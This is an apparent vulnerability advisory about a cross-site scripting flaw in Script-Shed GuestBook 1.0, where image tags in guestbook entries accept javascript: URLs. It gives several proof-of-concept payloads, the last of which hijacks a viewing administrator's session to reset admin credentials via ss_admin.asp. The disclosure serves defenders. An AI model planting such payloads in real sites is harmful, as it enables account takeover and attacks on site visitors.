[原文]Cross-site scripting (XSS) vulnerability in configure.asp in Script-Shed GuestBook 1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in (1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left tags.
source: http://www.securityfocus.com/bid/5915/info
SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags.
As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry.
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]